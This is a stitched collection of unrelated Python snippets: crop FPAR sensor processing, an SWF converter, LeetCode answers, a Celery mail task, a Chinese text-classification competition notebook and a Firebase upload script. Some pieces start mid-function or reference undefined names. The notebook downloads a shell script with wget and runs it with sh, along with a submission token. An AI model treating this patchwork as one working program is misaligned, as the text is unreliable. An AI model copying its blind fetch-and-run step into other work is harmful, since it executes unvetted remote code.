    datatodo = allplot.iloc[:,12:20] #all rows, columns 12-19 (the 8 PAR sensor readings)
    datatodo = np.array(datatodo)
    ABVs = datatodo[::6,:] #every 6th row: the above-canopy reading of each group
    BLWs = datatodo.reshape([-1,6,8])[:,1:5,:] #rows 1-4 of each 6-row group: below-canopy
    mean_per_seg = BLWs.mean(axis=1)
    r_t_rs_per_seg = mean_per_seg/ABVs
    r_t_rs_per_seg_mean = r_t_rs_per_seg.mean(axis=1) #average across the 8 sensors
    # Segments cycle r, t, rs; regroup and average 5 points per ESU.
    [r_point, t_point, rs_point] = r_t_rs_per_seg_mean.reshape([-1,3]).transpose(1,0)
    [r_ESU, t_ESU, rs_ESU] = [i.reshape(-1,5).mean(axis=1) for i in [r_point, t_point, rs_point]]
    doy = parse(xlspath)
    FIPAR_ESU = 1-t_ESU
    FAPAR_ESU = 1 - r_ESU - t_ESU * (1 - rs_ESU)
    print(FIPAR_ESU.mean(), FAPAR_ESU.mean())
    return doy, r_ESU.mean(), t_ESU.mean(), rs_ESU.mean(), FIPAR_ESU.mean(), FAPAR_ESU.mean()
def parse(filepath):
    """Return the day-of-year encoded in a filename like '<prefix>_YYYYMMDD.ext'."""
    stem = path.basename(filepath).split('_')[1]
    datestr = path.splitext(stem)[0]
    measured = datetime.strptime(datestr, '%Y%m%d')
    # Days since Jan 1 of the same year, 1-based.
    return (measured - datetime(measured.year, 1, 1)).days + 1
# inpath = r"F:\Hailun_experiment_20160519\Data\AccuPAR\diffusion"
# files = file_search_glob(inpath,"*.xls")
# data = np.array([Get_rtrs(i) for i in files])
# doy = data[:,0].astype('int')
# r = data[:,1]
# t = data[:,2]
# rs = data[:,3]
#
#
# with open(r"F:\Hailun_experiment_20160519\Data\AccuPAR\AccuPAR_data.txt", "w") as f:
#     f.write("%8s%8s%8s%8s\n" % ("doy", "ref", "trans", "ref_soil"))
#     for aa, bb, cc, dd in zip(doy, r, t, rs):
#         f.write("%s%8.2f%8.2f%8.2f\n" % (aa, bb, cc, dd))
#     f.close()
# Process every AccuPAR workbook and dump doy/FIPAR/FAPAR to a text table.
inpath = r"F:\Hailun_experiment_20160519\Data\AccuPAR\diffusion"
files = file_search_glob(inpath,"*.xls")
data = np.array([Get_rtrs(i) for i in files])
doy = data[:,0].astype('int')
FIPAR_ESU = data[:,4]
FAPAR_ESU = data[:,5]
with open(r"F:\Hailun_experiment_20160519\Data\AccuPAR\AccuPAR_FPAR.txt", "w") as f:
    f.write("%8s%8s%8s\n" % ("doy", "FIPAR_ESU", "FAPAR_ESU"))
    for aa, bb, cc in zip(doy, FIPAR_ESU, FAPAR_ESU):
        f.write("%s%8.2f%8.2f\n" % (aa, bb, cc))
    f.close()
# Plot the FPAR time series of plot A from a previously written table.
fig = plt.figure()
ax = fig.add_subplot(3,2,1)
filename = r"F:\Hailun_experiment_20160519\Data\AccuPAR\plotA_FPAR.txt"
a, b, c = [], [], []
with open(filename, 'r') as f:#1
    lines = f.readlines()#2
    for line in lines:#3
        value = [float(s) for s in line.split()]#4
        print(value)
        a.append(value[0])#5
        b.append(value[1])
        c.append(value[2])
fig.set_size_inches([35 / 2.54, 30/ 2.54])
ax.plot(a, b, marker='o', color='b',linewidth=2)
ax.plot(a, c, marker='^', color='r',linewidth=2)
# NOTE(review): top='on'/right='on' are deprecated tick_params values in
# newer matplotlib (use booleans); kept as-is for behavior parity.
ax.tick_params(direction='in',which='both', top='on', right='on')
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
ax.set_xlim(170, 270)
ax.set_xlabel('Day of year', fontsize='15')
ax.set_ylabel('FPAR', fontsize='15')
ax.text(172, 0.93, r'(a) Plot A (Maize)', ha='left', color='k', fontsize=13)
ax.legend(['FIPAR','FAPAR'],ncol=1,borderpad=0.2,handletextpad=0,columnspacing =1,handlelength =3,frameon =False,loc='lower right',fontsize=13)
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import subprocess
import sys
import Image
import subprocess
import tempfile
# Use the stdlib check_output on Python >= 2.7, otherwise a pure-python backport.
if sys.hexversion >= 0x02070000:
    check_output = subprocess.check_output
else:
    def _check_output_backport(*popenargs, **kwargs):
        r"""Run command with arguments and return its output as a byte string.
        Backported from Python 2.7 as it's implemented as pure python on stdlib.
        >>> check_output(['/usr/bin/python', '--version'])
        Python 2.6.2
        """
        process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
        output, unused_err = process.communicate()
        retcode = process.poll()
        if retcode:
            # Mirror the stdlib behavior: raise with the failing command
            # attached and the captured output on the error object.
            cmd = kwargs.get("args")
            if cmd is None:
                cmd = popenargs[0]
            error = subprocess.CalledProcessError(retcode, cmd)
            error.output = output
            raise error
        return output
    check_output = _check_output_backport
class SwfConverter(object):
    """Convert SWF slides into an images

    Require swfrender (from swftools: http://www.swftools.org/)
    """
    # Currently rely on swftools
    #
    # Would be great to have a native python dependency to convert swf into png or jpg.
    # However it seems that pyswf isn't flawless. Some graphical elements (like the text!) are lost during
    # the export.

    def __init__(self, swfrender_path='swfrender'):
        # Path to the swfrender binary; stdout/stderr slots kept for debugging.
        self.swfrender = swfrender_path
        self._stdout = None
        self._stderr = None

    def to_png(self, swf_path, png_path=None):
        """ Convert a slide into a PNG image.

        OSError is raised if swfrender is not available.
        An exception is raised if image cannot be created.
        """
        if not png_path:
            png_path = swf_path.replace(".swf", ".png")
        try:
            cmd = [self.swfrender, swf_path, '-o', png_path]
            check_output(cmd, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            raise Exception(u"Failed to convert SWF file %s.\n"
                            u"\tExit status: %s.\n\tOutput:\n%s" % (swf_path, e.returncode, e.output))
        return png_path

    def to_jpeg(self, swf_path, jpg_path=None):
        """ Convert a slide into a JPEG image.

        OSError is raised if swfrender is not available.
        An exception is raised if image cannot be created.
        """
        if not jpg_path:
            jpg_path = swf_path.replace(".swf", ".jpg")
        # Bug fix: tempfile.mktemp() only returns a name and is race-prone
        # (another process can claim the path first); mkstemp() atomically
        # creates the file. We close the fd since swfrender writes the path.
        fd, png_path = tempfile.mkstemp(suffix=".png")
        os.close(fd)
        try:
            self.to_png(swf_path, png_path)
            Image.open(png_path).convert('RGB').save(jpg_path, 'jpeg')
        finally:
            # Bug fix: the temp PNG used to leak when conversion failed.
            os.remove(png_path)
        return jpg_path
|
class Solution:
    def findLongestWord(self, s: str, d: 'list[str]') -> str:
        """Return the longest word in d that is a subsequence of s,
        preferring the lexicographically smallest on length ties.

        Fix: the original annotation `List[str]` was used without importing
        typing.List, which raises NameError when the class is defined; the
        string annotation avoids any import requirement.
        """
        def is_subseq(word: str, source: str) -> bool:
            # Greedy two-pointer scan; bail out once the remaining source
            # is shorter than the remaining word.
            i, j, m, n = 0, 0, len(word), len(source)
            while i < m and j < n and n - j >= m - i:
                if word[i] == source[j]:
                    i += 1
                j += 1
            return i == m

        res = ''
        # Longest candidates first, so the first strictly-shorter word
        # means no better answer can follow.
        for word in sorted(d, key=len, reverse=True):
            if len(word) < len(res):
                return res
            if (not res or word < res) and is_subseq(word, s):
                res = word
        return res
import pickle

# For each named run, average the test log-likelihood (taken at the epoch
# with the best validation LL) over all per-cluster record files.
path = "../models/%s/svhn/num_clusters_100/cluster_%u/record.pkl"
clusters = 100
names = ["einet_0_0", "einet_0_1"]

for name in names:
    avg_best = 0.0
    for c in range(clusters):
        try:
            # Context manager fixes the leaked file handle of the original.
            with open(path % (name, c), 'rb') as fh:
                record = pickle.load(fh)
            # Epoch with the best validation LL; may raise (ValueError on an
            # empty list, KeyError on a malformed record) — caught below.
            best_idx = record['valid_ll'].index(max(record['valid_ll']))
            test_ll = record['test_ll'][best_idx]
            print("%u %s %f %f" % (c, name, record['best_validation_ll'], test_ll))
            avg_best += test_ll
        except Exception as e:
            # Best-effort: report and skip missing/corrupt records.
            print(e)
    # NOTE(review): divides by the full cluster count even when some records
    # failed to load — preserved from the original averaging.
    avg_best /= clusters
    print("%s %f" % (name, avg_best))
from itertools import combinations

# Find three entries summing to 2020 and print the product of each such
# triple (Advent-of-Code style puzzle).
with open('input_xr.txt') as f:
    data_list = [int(line) for line in f.read().splitlines()]

# combinations() picks three *distinct* positions; the original
# range(i, ...)/range(j, ...) loops could pair an element with itself.
for a, b, c in combinations(data_list, 3):
    if a + b + c == 2020:
        print(a * b * c)
from os import environ
from os.path import join as path_join

# Point ISIS at the active conda prefix unless the caller configured it.
if "ISISROOT" not in environ:
    environ["ISISROOT"] = environ["CONDA_PREFIX"]
# Default the data area to <ISISROOT>/data, honouring an explicit setting.
if "ISISDATA" not in environ:
    environ["ISISDATA"] = path_join(environ["ISISROOT"], "data")
import re

email_address = 'Please contact us at: support@datacamp.com'

# Capture the user name (group 1) and host (group 2) of the first
# e-mail-like token in the text.
pattern = re.compile(r'([\w\.-]+)@([\w\.-]+)')
match = pattern.search(email_address)
if match:
    print(match.group())   # the whole matched text
    print(match.group(1))  # the username
    print(match.group(2))  # the host
# Created by Luis A. Sanchez-Perez (alejand@umich.edu).
# Copyright © Do not distribute or use without authorization from author
import tensorflow as tf
class SpectrogamSequencer(tf.keras.layers.Layer):
    """
    A non-trainable layer that slices an input spectrogram into a sequence of
    potentially overlapping windows along the time axis.

    Inputs are expected to be (batch, freq, time, 1).
    Outputs will be (batch, windows, freq, window_size, 1).
    """
    def __init__(self, window_size: int, window_overlap=0.5, name='Sequencer', **kwargs):
        super(SpectrogamSequencer, self).__init__(name=name, **kwargs)
        # Config to determine sequences
        self.window_size = window_size        # window length in time steps
        self.window_overlap = window_overlap  # fraction of overlap between windows
        # Items related to the input/output shape (filled in by build())
        self.indexes = None    # (windows, 2) tensor of [start, end) bounds
        self.channels = None
        self.mfcc = None       # frequency-bin count of the input
        self.length = None     # number of windows produced
        # Not trainable layer
        self.trainable = False

    def build(self, input_shape):
        # Determine [start, end) indexes for every time-axis slice.
        samples = input_shape[2]
        step = int(self.window_size * (1.0 - self.window_overlap))
        start = tf.range(0, samples - self.window_size, step)
        end = tf.range(self.window_size, samples, step)
        self.indexes = tf.stack([start, end], axis=1)
        self.length = start.shape[0]
        self.channels = input_shape[-1]
        # BUG FIX: with inputs laid out (batch, freq, time, 1) the frequency
        # dimension is input_shape[1]; the original stored input_shape[0]
        # (the batch size), corrupting the static shape set in call().
        self.mfcc = input_shape[1]

    def call(self, inputs):
        # Check slice indexes were generated by build() already.
        if self.indexes is None:
            raise Exception('You must build the layer before calling it.')
        # One slice per window -> (windows, batch, freq, window_size, ch).
        sequence = tf.map_fn(lambda index: inputs[:, :, index[0]:index[1], :],
                             self.indexes,
                             back_prop=False,
                             dtype=tf.float32)
        # Move the window axis after batch and pin the static output shape.
        output = tf.transpose(sequence, perm=[1, 0, 2, 3, 4])
        shape = tf.TensorShape(
            [None, self.length, self.mfcc, self.window_size, self.channels]
        )
        output.set_shape(shape)
        return output
|
from celery.decorators import periodic_task
from celery.schedules import crontab
from django.conf import settings
from django.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAlternatives
import redis
import json
@periodic_task(run_every=(crontab(minute='*/1')))
def send_super_statistic():
    """Every minute: pop the queued report rows from Redis and e-mail them
    to the superusers as an HTML report; print 'null' when the queue is empty.
    """
    r = redis.StrictRedis(
        host=settings.CELERY_REDIS_HOST,
        port=settings.CELERY_REDIS_PORT,
        db=settings.CELERY_REDIS_DB
    )
    redis_key = settings.REDIS_VAR
    obj_len = r.llen(redis_key)
    subject = 'Data reporting'
    from_email = settings.EMAIL_HOST_USER
    if obj_len:
        # Decode every queued JSON row in one pass.
        object_list = [json.loads(obj)
                       for obj in r.lrange(redis_key, 0, obj_len - 1)]
        htmly = get_template('addition_page/email_super_statistic.html')
        text_content = htmly.render(Context({'object_list': object_list}))
        msg = EmailMultiAlternatives(
            subject,
            text_content,
            from_email,
            settings.EMAIL_SUPERUSERS
        )
        msg.attach_alternative(text_content, 'text/html')
        msg.send()
        # Trim only the rows just sent; rows pushed meanwhile survive.
        r.ltrim(redis_key, obj_len, -1)
    else:
        # Fixed the Python-2 print statement (`print 'null'`).
        print('null')
|
class Solution(object):
    def letterCombinations(self, digits):
        """
        :type digits: str
        :rtype: List[str]

        Fixed: the original helper never emitted anything (it appended the
        prefix list to itself and returned early for single-digit input),
        so this method always returned [].  Empty input now returns [].
        """
        if not digits:
            return []
        combinations = []
        self.helper(digits, combinations.append, 0, [])
        return combinations

    def helper(self, digits, combinations, index, prefix=None):
        """
        Recursive builder.  `combinations` is a callable (e.g. list.append)
        that receives each finished combination string.
        """
        digit_map = {
            '1': '', '2': 'abc', '3': 'def',
            '4': 'ghi', '5': 'jkl', '6': 'mno',
            '7': 'pqrs', '8': 'tuv', '9': 'wxyz'
        }
        if prefix is None:
            prefix = []
        if index >= len(digits):
            combinations(''.join(prefix))
            return
        for letter in digit_map[digits[index]]:
            prefix.append(letter)
            self.helper(digits, combinations, index + 1, prefix)
            prefix.pop()

    def iterative_combination(self, digits):
        """
        Breadth-first expansion: extend each partial combination with every
        letter of the next digit.  (Leftover debug prints removed.)

        Credit:
        https://leetcode.com/problems/letter-combinations-of-a-phone-number/discuss/184395/Python-20ms-faster-than-100.00-of-other-python-submissions
        """
        digit_map = {
            '1': '', '2': 'abc', '3': 'def',
            '4': 'ghi', '5': 'jkl', '6': 'mno',
            '7': 'pqrs', '8': 'tuv', '9': 'wxyz'
        }
        all_combinations = [""]
        for digit in digits:
            all_combinations = [com + letter
                                for com in all_combinations
                                for letter in digit_map[digit]]
        return all_combinations
# Quick manual check of the iterative builder.
digits = '29'
obj = Solution()
combinations = obj.iterative_combination(digits)
print(combinations)
|
import re
from emailReceive import EmailReceive
from emailSend import EmailSend
class EmailUtil(object):
    """Static helpers bridging the project's EmailReceive/EmailSend wrappers."""
    @staticmethod
    def getLink(address,password,title=('title',),regular=r'http',findAll=False,debug=0):
        # Fetch e-mails matching `title` and return the first link captured
        # by the `regular` pattern from any message body line.
        print('Getting into EmailReceive............')
        allRes = EmailReceive(address, password).getEmail(keyword=title, onlyUnsee=False, findAll=findAll)
        if allRes is None or allRes == []:
            print('find email wrong:',title)
            return 'Email Dead or nothing found'
        print('find email ok:',title)
        if debug == 1:
            print(allRes)
        pattern = re.compile(regular)
        for head,body in allRes:
            if body :
                for item in body:
                    # Strip line breaks before matching from the string start.
                    co = pattern.match(item.replace('\r\n','').replace('\n',''))
                    if co:
                        # NOTE(review): group(1) requires `regular` to contain
                        # a capture group; the default r'http' has none and
                        # would raise IndexError here — confirm callers always
                        # pass a grouped pattern.
                        print('find email-web-link ok:',co.group(1))
                        return co.group(1)
        print('find link wrong')
        return 'Email Alive but noting found'
    @staticmethod
    def getEmail(address,password,title,onlyUnsee=False,findAll=True):
        # Thin pass-through to EmailReceive.getEmail.
        return EmailReceive(address,password).getEmail(keyword=title,onlyUnsee=onlyUnsee,findAll=findAll)
    @staticmethod
    def sendEmail(senderAddr,senderPassword,receiverList,title,body):
        # Thin pass-through to EmailSend.sendEmail.
        return EmailSend().sendEmail(senderAddr, senderPassword,receiverList,title, body)
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# View dataset directory. This directory will be recovered automatically after resetting environment.
get_ipython().system('ls /home/aistudio/data')
# In[ ]:
# View personal work directory. All changes under this directory will be kept even after reset. Please clean unnecessary files in time to speed up environment loading.
get_ipython().system('ls /home/aistudio/work')
# Please click [here ](https://ai.baidu.com/docs#/AIStudio_Project_Notebook/a38e5576) for more detailed instructions.
# In[1]:
# Unpack the competition archive shipped with the dataset.
get_ipython().system('unzip data/data25959/归档.zip')
# Build the token dictionary and restore the original text from token ids.
# In[2]:
# dict.txt holds a printed python-dict literal {'token': id, ...}; strip the
# surrounding braces and parse the entries by hand.
line= open ('dict.txt').read()
line=line[1:]
line=line[:-2]
dict1 = {}
ones= line.split(',')
for one in ones:
    one=one.strip()
    try:
        dict1[one.split(':')[0].replace("'","")]=int(one.split(':')[1])
    except IndexError as s:
        # fragments without a ':' (the comma split breaks one entry) are skipped
        pass
# In[3]:
# Reverse map id -> token; 1466 is the comma token re-added by hand.
dict1_rev = {v:k for k,v in dict1.items()}
dict1_rev[1466]=','
# In[36]:
# Rebuild "label<TAB>text" rows from the id-encoded training file.
import pandas as pd
data=[]
with open('shuffle_Train_IDs.txt', 'r', encoding='utf-8') as f:
    lines = f.readlines()
    for line in lines:
        left,right=line.strip().split('\t')
        tmp_sents = []
        tmp=''
        tmp_sents.append(right)
        for word in left.strip().split(','):
            tmp=tmp+dict1_rev[int(word)]
        tmp_sents.append(tmp)
        data.append(tmp_sents)
df=pd.DataFrame(data,columns=['label','text_a'])
df.to_csv('all_data.tsv',sep='\t',index=False)
# Data augmentation: random span deletion + random span replacement.
# The original notebook contained four nearly identical copy-pasted cells
# (In[8]/In[50] deletion, In[9]/In[51] replacement); they are factored into
# two helpers.  Fixed along the way: texts whose length hit exactly 30/50/70
# fell through every branch to the heaviest augmentation, and span indices
# drawn on the *original* length could be stale or unbound after deletions.
# In[49]:
import random

_DIGITS = '0123456789'


def _strip_digits(text):
    # Every cell first removed all digit characters from the text.
    return ''.join(ch for ch in text if ch not in _DIGITS)


def _span_count(n):
    # Longer texts receive more augmentation operations (1..4).
    if n < 30:
        return 1
    elif n < 50:
        return 2
    elif n < 70:
        return 3
    return 4


def _augment_by_deletion(frame):
    """Return a new (label, text_a) DataFrame where each digit-stripped text
    has 1-4 random two-char spans deleted (more for longer texts)."""
    rows = []
    for label, text in zip(frame['label'], frame['text_a']):
        text = _strip_digits(text)
        for _ in range(_span_count(len(text))):
            if len(text) > 2:
                start = random.randint(0, len(text) - 2)
                # str.replace drops *all* occurrences of the chosen span,
                # matching the original cells' behaviour.
                text = text.replace(text[start:start + 2], '')
        rows.append([label, text])
    return pd.DataFrame(rows, columns=['label', 'text_a'])


def _augment_by_swap(frame):
    """Return a new (label, text_a) DataFrame where each digit-stripped text
    has 1-4 random two-char spans replaced by other spans of the same text."""
    rows = []
    for label, text in zip(frame['label'], frame['text_a']):
        text = _strip_digits(text)
        for _ in range(_span_count(len(text))):
            if len(text) >= 2:
                src = random.randint(0, len(text) - 1)
                dst = random.randint(0, len(text) - 1)
                text = text.replace(text[src:src + 2], text[dst:dst + 2])
        rows.append([label, text])
    return pd.DataFrame(rows, columns=['label', 'text_a'])


df = pd.read_csv('pseudo_7.tsv', sep='\t')
print(len(df))

# In[8]: deletion-augmented copy #1
df1 = _augment_by_deletion(df)
print(df1[:5])
print(len(df1))

# In[50]: deletion-augmented copy #2
df2 = _augment_by_deletion(df)
print(df2[:5])
print(len(df2))

# In[9]: replacement-augmented copy #1
df3 = _augment_by_swap(df)
print(df3[:5])
print(len(df3))

# In[51]: replacement-augmented copy #2
df4 = _augment_by_swap(df)
print(df4[:5])
print(len(df4))
# In[52]:
# Append the two kept augmented copies (df2: deletion, df4: replacement) to
# the training frame.  DataFrame.append is deprecated (removed in pandas
# 2.0); pd.concat with the default ignore_index=False is the exact
# replacement.
df = pd.concat([df, df2])
df = pd.concat([df, df4])
print(len(df))
# In[48]:
print(len(df1))
# In[53]:
df.to_csv('eda_p.tsv', sep='\t', header=True, index=False)
# Download the pretrained models and set up PALM.
# In[33]:
get_ipython().system('git clone https://github.com/PaddlePaddle/PALM.git')
# In[35]:
get_ipython().system('cp -r PALM/paddlepalm PALM/examples/classification')
# In[1]:
get_ipython().system('cp PALM/examples/classification/run.py PALM/examples/classification/run1.py')
# In[11]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_roberta_wwm_ext_L-12_H-768_A-12.tar.gz'")
# In[2]:
get_ipython().system("wget 'https://baidu-nlp.bj.bcebos.com/ERNIE_stable-1.0.1.tar.gz'")
# In[86]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_L-12_H-768_A-12.tar.gz'")
# In[1]:
get_ipython().system("wget 'https://ernie.bj.bcebos.com/ERNIE_1.0_max-len-512.tar.gz'")
# In[20]:
get_ipython().system("wget 'https://bert-models.bj.bcebos.com/chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.tar.gz'")
# In[6]:
# Unpack each checkpoint into its own directory.
get_ipython().system('tar zxvf ERNIE_stable-1.0.1.tar.gz -C p/')
# In[21]:
get_ipython().system('tar zxvf chinese_roberta_wwm_large_ext_L-24_H-1024_A-16.tar.gz -C Roberta_large/')
# In[12]:
get_ipython().system('tar zxvf chinese_roberta_wwm_ext_L-12_H-768_A-12.tar.gz -C Roberta_base/')
# In[2]:
get_ipython().system('tar zxvf ERNIE_1.0_max-len-512.tar.gz -C ernie_large/')
# In[87]:
get_ipython().system('tar zxvf chinese_L-12_H-768_A-12.tar.gz -C b/')
# In[8]:
# Wrap the raw test sentences into the (label, text_a) layout; 0 is a
# placeholder label column.
import pandas as pd
data=[]
with open('Test.txt', 'r', encoding='utf-8') as f:
    lines = f.readlines()
    for line in lines:
        line=line.strip()
        tmp_sents = []
        tmp_sents.append(0)
        tmp_sents.append(line)
        data.append(tmp_sents)
df=pd.DataFrame(data,columns=['label','text_a'])
df.to_csv('pre.tsv',sep='\t',index=False,header=True)
# In[ ]:
# Launch the two training/prediction runs.
get_ipython().system('python PALM/examples/classification/run1.py')
get_ipython().system('python PALM/examples/classification/run2.py')
# In[9]:
get_ipython().system('cp PALM/examples/classification/run1.py PALM/examples/classification/run2.py')
# Run the dedicated prediction step.
# In[55]:
import pandas as pd
import json
import numpy as np


def res_evaluate(res_dir="./outputs7/predict/predictions.json", eval_phase='test'):
    """Extract the predicted 'label' from every line of a predictions file
    (one JSON object per line) and write them to fin3.csv.

    eval_phase must be 'dev' or 'test'.  The original branch assigned the
    same unused data file for both phases, so those dead assignments were
    removed; the phase validation is kept.
    """
    assert eval_phase in ['dev', 'test'], 'eval_phase should be dev or test'
    preds = []
    # Context manager closes the file (the original handle was leaked).
    with open(res_dir, "r") as file:
        for line in file:
            record = json.loads(line)
            preds.append(str(record['label']))
    df = pd.DataFrame()
    df['label'] = preds
    df.to_csv('fin3.csv', index=False)


res_evaluate()
# In[56]:
# Load the numeric predictions written by res_evaluate().
import pandas as pd
df=pd.read_csv('fin3.csv')
print(len(df))
print(df[:5])
# In[71]:
# Map class ids to the Chinese category names required by the submission.
df['label1'] = df['label'].map({0:'财经',1:'彩票',2:'房产',3:'股票',4:'家居',5:'教育',6:'科技',7:'社会',8:'时尚',9:'时政',10:'体育',11:'星座',12:'游戏',13:'娱乐'})
# In[72]:
print(len(df))
# In[73]:
print(df['label1'] [:5])
# In[74]:
df['label1'].to_csv('submission1.txt',index=False)
# In[ ]:
df['label1'].to_csv('my.csv',index=False)
# In[75]:
# Fetch the official submit script and upload the predictions.
get_ipython().system('rm -rf submit.sh')
get_ipython().system('wget -O submit.sh http://ai-studio-static.bj.bcebos.com/script/submit.sh')
get_ipython().system('sh submit.sh submission1.txt 7abbc535bcc541c7afe59a0cee03fe7c')
# In[36]:
pre=pd.read_csv('pre.tsv',sep='\t')
print(pre[:30])
# In[39]:
s=pd.concat([pre['text_a'],df['label1']],axis=1) # merge the two columns horizontally
# In[40]:
s.to_csv('fin4.csv',index=False)
# In[74]:
# Inspect the class balance of the reconstructed training data.
w=pd.read_csv('all_data.tsv',sep='\t')
print(len(w))
print(len(w[w['label']==0]))
print(len(w[w['label']==13])/len(w))
# Merge the ensemble prediction results.
# In[77]:
# Merge the 13 model prediction files into one uniformly averaged ensemble.
# The original cell copy-pasted the same read loop thirteen times and never
# closed the files; a single helper replaces them all.
import json
import numpy as np
import pandas as pd


def _load_probs(path):
    """Load one predictions file (one JSON object per line) and return the
    per-line 'probs' vectors as a 2-D numpy array."""
    rows = []
    with open(path, "r") as file:
        for line in file:
            rows.append(json.loads(line)['probs'])
    return np.array(rows)


# The 13 runs saved their predictions under slightly different sub-paths.
_PREDICTION_FILES = [
    'outputs1-8/outputs1/predict/predictions.json',
    'outputs1-8/outputs2/predictions.json',
    'outputs1-8/outputs3/predictions.json',
    'outputs1-8/outputs4/predictions.json',
    'outputs1-8/outputs5/predictions.json',
    'outputs1-8/outputs6/predict/predictions.json',
    'outputs1-8/outputs7/predict/predictions.json',
    'outputs1-8/outputs8/predict/predictions.json',
    'outputs9/predict/predictions.json',
    'outputs10/predictions.json',
    'outputs11/predict/predictions.json',
    'outputs12/predict/predictions.json',
    'outputs13/predict/predictions.json',
]
_all_preds = [_load_probs(p) for p in _PREDICTION_FILES]
# Keep the individual preds1..preds13 names other cells may refer to.
(preds1, preds2, preds3, preds4, preds5, preds6, preds7, preds8, preds9,
 preds10, preds11, preds12, preds13) = _all_preds

# Uniform average of the 13 probability matrices (was 1/13*preds1 + ...).
new = sum(_all_preds) / len(_all_preds)
print(new[:5])

df = pd.DataFrame()
df['label'] = np.argmax(new, axis=1)   # ensemble class id per sentence
df['m'] = np.max(new, axis=1)          # ensemble confidence per sentence
df['result'] = df['label'].astype(str)

# In[78]:
# Attach the ensemble label/confidence to the test sentences.
pre = pd.read_csv('pre.tsv', sep='\t')
pre['prob'] = df['m']
pre['label'] = df['label']
print(pre[:5])
# Build pseudo-labels from confident ensemble predictions (repeatable step).
# In[79]:
# Keep test sentences whose ensemble confidence exceeds 0.9.
useful=pre[pre['prob']>0.9][['label','text_a']]
print(len(useful))
print(len(pre))
print(useful)
# In[80]:
# Append the pseudo-labelled rows to the 70% training split.
train=pd.read_csv('7.tsv',sep='\t')
print(len(train))
new_train = pd.concat([train, useful]).reset_index(drop=True)
print(len(new_train))
print(new_train[:5])
# In[81]:
new_train.to_csv('pseudo_7.tsv',sep='\t',index=False,header=True)
# In[54]:
a=pd.read_csv('pseudo.tsv',sep='\t')
print(len(a))
print(a[:5])
# In[29]:
get_ipython().system('cp outputs/predict10/predictions.json outputs10/')
# In[ ]:
# In[76]:
# Take the first 70% of the full data as the base training split.
data=pd.read_csv('all_data.tsv',sep='\t')
print(len(data))
df=data[:int(len(data)*0.7)]
print(len(df))
print(df[:5])
df.to_csv('7.tsv',sep='\t',header=True,index=False)
# In[ ]:
|
from sklearn.linear_model import LinearRegression
import statsmodels.api as sm
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

# Load the survey data; 999 marks a missing value.
data = pd.read_csv("./regressionData(2019).csv", na_values=[999])
# Columns: academic stress, family stress, depression, smartphone addiction.
df = pd.DataFrame(data, columns = ['학업스트레스', '가족스트레스', '우울', '스마트폰중독'])
df = df.dropna()  # drop rows with missing values

x = df["학업스트레스"]   # predictor: academic stress
y = df["스마트폰중독"]   # response: smartphone addiction

# OLS summary via statsmodels (needs an explicit intercept column).
xCon = sm.add_constant(x)
model = sm.OLS(y, xCon)
result = model.fit()
resultSummary = result.summary()
print(resultSummary)

# scikit-learn fit for prediction and plotting (expects 2-D X).
line_fitter = LinearRegression()
line_fitter.fit(x.values.reshape(-1,1), y)

newStress = 3.12
# FIX: predict at newStress itself; the original predicted at the
# hard-coded value 3 while reporting 3.12 in the printed message.
newStudents = line_fitter.predict([[newStress]])
print('학업stress가', newStress, '점일때, 20학번 신입생의 1년 후 스마트폰중독 수준 예측:', newStudents)

plt.plot(x, y, 'o')
plt.plot(x, line_fitter.predict(x.values.reshape(-1,1)))
plt.show()
|
import os
import pandas as pd
from openpyxl import load_workbook
# Append the entered name as a new row of new.xlsx, upload it to Firebase
# storage, then download data/demo.xlsx back as lol.xlsx.
# NOTE(review): `pyrebase` is used below but never imported here, and
# `config` is undefined in this file — the script cannot run as-is; confirm
# the missing import/config against the original project.
name = input("Enter your name - ")
df = pd.DataFrame({'Name' : [name]})
writer = pd.ExcelWriter('new.xlsx', engine='openpyxl')
# Reuse the existing workbook/sheets so to_excel appends instead of
# overwriting (this writer.book pattern is deprecated in newer pandas).
writer.book = load_workbook('new.xlsx')
writer.sheets = dict((ws.title, ws) for ws in writer.book.worksheets)
reader = pd.read_excel('new.xlsx')
df.to_excel(writer, index=False, header=False, startrow=len(reader)+1)
writer.close()
firebase = pyrebase.initialize_app(config)
storage = firebase.storage()
path_on_cloud = "data/demo.xlsx"
path_local="new.xlsx";
storage.child(path_on_cloud).put(path_local)
#d = os.getcwd()
#os.chdir(d)
#storage.child(path_on_cloud).download("new.xlsx")
os.remove("new.xlsx")
firebase = pyrebase.initialize_app(config)
storage = firebase.storage()
path_on_cloud = "data/demo.xlsx"
#path_local=r'D:\lol\demo.xlsx';
